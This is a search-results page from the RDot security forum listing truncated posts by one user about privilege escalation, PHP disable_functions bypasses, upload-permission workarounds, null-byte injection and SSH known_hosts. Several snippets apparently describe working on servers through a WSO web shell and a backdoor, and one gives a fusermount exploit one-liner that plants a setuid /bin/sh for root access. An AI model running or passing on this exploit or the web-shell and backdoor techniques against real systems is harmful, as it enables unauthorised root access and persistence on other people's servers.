Вернуться   RDot: White Hat Security Community > Поиск по форуму

Показано с 1 по 25 из 78.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: ewi
Раздел: Инструментарий/Tools 15.07.2016, 12:18
Ответов: 7
Просмотров: 15,968
Автор ewi
Пользуюсь proxifier. Весь...

Пользуюсь proxifier. Весь виндовый софт через него
Есть прога на java, выполняется через консоль cmd, обращается к...
Раздел: Повышение привилегий/Privilege escalation 26.01.2016, 14:21
Ответов: 1,219
Просмотров: 1,441,697
Автор ewi
Как винду порутать или...

Как винду порутать или хоть как то поднять привилегии? Версия 2008 SP1 без обнов походу, wmic qfe пуст. Права юзера -...
Раздел: Оффтоп/Offtopic 06.09.2015, 12:03
Ответов: 6
Просмотров: 11,237
Автор ewi
ок, ты прав

ок, ты прав
Раздел: Оффтоп/Offtopic 06.09.2015, 11:08
Ответов: 6
Просмотров: 11,237
Автор ewi
калькулятор это не пример,...

калькулятор это не пример, это аллегория

Вот пример. Это когда надо округлить число в меньшую сторону...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 05.09.2015, 19:17
Ответов: 7
Просмотров: 25,794
Автор ewi
Suhosin может?

Suhosin может?
Раздел: Оффтоп/Offtopic 05.09.2015, 17:26
Ответов: 6
Просмотров: 11,237
Автор ewi
Никогда не пользовался (int)...

Никогда не пользовался (int) в php, предчувствие что ли... Вот в каком коде без (int) не обойтись, кто нибудь приведет...
Раздел: Целевые системы/Target systems 30.08.2015, 22:41
Ответов: 1
Просмотров: 20,782
Автор ewi
Question Чё за мигалка, смешно

Наткнулся на странный серв, интересно, этому есть объяснение?
Вот шелл обычный wso, выполняем uname несколько...
Раздел: Web-среда/Web-applications 06.08.2015, 16:18
Ответов: 5
Просмотров: 12,287
Автор ewi
Ещё одна похожая ситуация...

Ещё одна похожая ситуация с ошибкой 500. Как бы всё тоже самое, кроме одного отличия. Раширения, отличные от php,...
Раздел: Web-среда/Web-applications 06.08.2015, 16:03
Ответов: 5
Просмотров: 14,719
Автор ewi
Заливка? Я про...

Заливка? Я про файл-аплодер. Проблема в том что скрипт аплодера делает chmod(0777), а хостинг не даёт выполниться...
Раздел: Web-среда/Web-applications 06.08.2015, 15:25
Ответов: 5
Просмотров: 14,719
Автор ewi
Question Обход chmod 777 - 503 Service Temporarily Unavailable

Могу залить любой файл. Но заливка ставит chmod(0777) и скрипт выдаёт ошибку 503.
Хостинг Агава. Я заказал тестовый...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.08.2015, 21:25
Ответов: 4
Просмотров: 21,175
Автор ewi
нда... ман FreeBSD...

нда... ман FreeBSD (https://www.freebsd.org/doc/ru/books/handbook/openssh.html), пп 14.11.3. SSH клиент :(
А по логам рут копировал через scp file root@host....
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 01.08.2015, 20:35
Ответов: 4
Просмотров: 21,175
Автор ewi
Question Полный набор .ssh/known_hosts

Имеется кофиг .ssh/known_hosts со списочком из ключей со всевозможными локальными ip. Можно ли с этой локалкой что...
Раздел: Web-среда/Web-applications 01.08.2015, 16:15
Ответов: 5
Просмотров: 12,287
Автор ewi
Есть возможность залить,...

Есть возможность залить, но не выставить права +x



Перезаписать можно, но у меня нет доступа к путям выше....
Раздел: *nix-like 29.07.2015, 20:10
Ответов: 167
Просмотров: 233,351
Автор ewi
как сделать отправку файла...

как сделать отправку файла на ftp в одну строку?
Раздел: Web-среда/Web-applications 26.07.2015, 22:20
Ответов: 3
Просмотров: 11,847
Автор ewi
Не, у меня другой случай,...

Не, у меня другой случай, когда как раз всё понятно, как делать запрос методом GET. А в коде содержится баг...
Раздел: Web-среда/Web-applications 26.07.2015, 16:36
Ответов: 3
Просмотров: 11,847
Автор ewi
Сам спросил - сам же и...

Сам спросил - сам же и отвечу. Для PHP не составляет труда добавить нулевой символ в строку:

$post_field['a'] = 'file' ....
Раздел: Web-среда/Web-applications 26.07.2015, 16:17
Ответов: 3
Просмотров: 11,847
Автор ewi
Question Как отправить символ %00 методом POST

Если с GET всё понятно: ?a=file%00
то как то же самое сделать с полем POST?
Раздел: Повышение привилегий/Privilege escalation 15.07.2015, 22:14
Ответов: 6
Просмотров: 19,930
Автор ewi
$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b...

$ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
sending file descriptor: Socket operation on non-socket

$ uname -a...
Раздел: Web-среда/Web-applications 12.07.2015, 23:55
Ответов: 5
Просмотров: 12,287
Автор ewi
Question Ошибка 500 на директорию

Какой может быть .htaccess на папку, чтобы вызывать ошибку 500 internal server error при вызове любого php-скрипта, даже путём...
Раздел: Криптография/Cryptography 11.07.2015, 22:28
Ответов: 1
Просмотров: 17,156
Автор ewi
Зачем тебе...

Зачем тебе авто-определение Base64, JSON и ROT13? А если используется комбинация нескольких кодирований, включая...
Раздел: Повышение привилегий/Privilege escalation 10.07.2015, 20:50
Ответов: 4
Просмотров: 18,465
Автор ewi
Linux *** 3.13.0-24-generic #47-Ubuntu SMP Fri...

Linux *** 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64

Убунту специально делают такую дырявую?
Раздел: *nix-like 06.07.2015, 20:25
Ответов: 167
Просмотров: 233,351
Автор ewi
Как с помощью ps aux понять,...

Как с помощью ps aux понять, что рут зашел в систему? Буквально то есть
Раздел: Целевые системы/Target systems 06.07.2015, 15:03
Ответов: 10
Просмотров: 49,337
Автор ewi
В моём случае popen тоже disable ...

В моём случае popen тоже disable
Я думаю, даже если доступ к шеллу потеряется, достаточно будет запомнить путь до...
Раздел: Целевые системы/Target systems 06.07.2015, 13:37
Ответов: 10
Просмотров: 49,337
Автор ewi
safe mode может и обходит, а...

safe mode может и обходит, а disable_functions - нет, в случае system('id') - не работает

Чтобы учитывать этот случай, в backdoor.c...
Раздел: Уязвимости PHP/PHP vulnerabilities 29.06.2015, 10:59
Ответов: 21
Просмотров: 94,776
Автор ewi
Bug #46741 Отработал на 100% =)...

Bug #46741

Отработал на 100%
=)

https://bugs.php.net/bug.php?id=46741

Ещё раз исходная тема:
Показано с 1 по 25 из 78.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot